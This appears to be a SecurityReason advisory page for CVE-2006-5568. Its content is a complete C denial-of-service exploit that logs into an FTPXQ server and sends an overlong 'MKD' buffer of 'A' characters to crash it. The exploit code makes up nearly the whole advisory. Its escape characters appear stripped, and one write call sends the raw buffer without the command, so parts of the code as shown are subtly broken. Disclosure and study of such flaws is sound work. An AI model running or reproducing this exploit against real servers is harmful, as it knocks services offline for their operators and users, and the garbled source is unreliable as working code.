|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1789 CVE : CVE-2006-5568 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Federico Fazzi Published : 31.10.2006
Advisory Content : /* * 0xf_ftpxq.c - FTPXQ Denial of service exploit. * Federico Fazzi <federico at autistici.org> * * advisory by Eric Sesterhenn. * -- Server built using the WinsockQ from DataWizard Technologies. A security * -- vulnerability in the product allows remote attackers to overflow an * -- internal buffer by providing an overly long "make directory" request. * * r20061025. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> // AAAAAAAAAAAAAAAA..AA*255 in hex format. char bof[] = "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41"; int main(int argc, char **argv) { int sd; socklen_t len; struct sockaddr_in saddr; struct hostent *he; char buf[512], tmpbuf[128]; if(argc != 5) { printf("FTPXQ Server - Denial of service exploit.n" "Federico Fazzi <federico at autistici.org>nn" "usage: %s <hostname> <port> <user> <password>n", argv[0]); exit(1); } if((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); } // init socket if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); exit(1); } // setup struct bzero((char *) &saddr, sizeof(saddr)); saddr.sin_family = AF_INET; bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length); saddr.sin_port = htons(atoi(argv[2])); len = sizeof(struct sockaddr); // init connection if(connect(sd, (struct sockaddr *)&saddr, len) == -1) { perror("connect()"); exit(1); } printf("FTPXQ Server - Denial of service exploit.n" "Federico Fazzi <federico at autistici.org>n" "---------------------------------------n"); puts("connecting..tt done"); // sending a USER data to daemon sprintf(buf, "USER %srn", argv[3]); write(sd, buf, strlen(buf)); puts("sending USER data..t done"); // sending a PASS data to daemon sprintf(buf, "PASS %srn", argv[4]); write(sd, buf, strlen(buf)); puts("sending PASS data..t done"); // sending a BOF string with MKD command to host sprintf(buf, "MKD %s", bof); write(sd, bof, strlen(bof)); puts("sending MKD bof string.. done"); // now checking if server i down if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0) puts("[!] server doesn't vulnerable"); else puts("[+] server getting down.. done"); close(sd); return(0); }  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |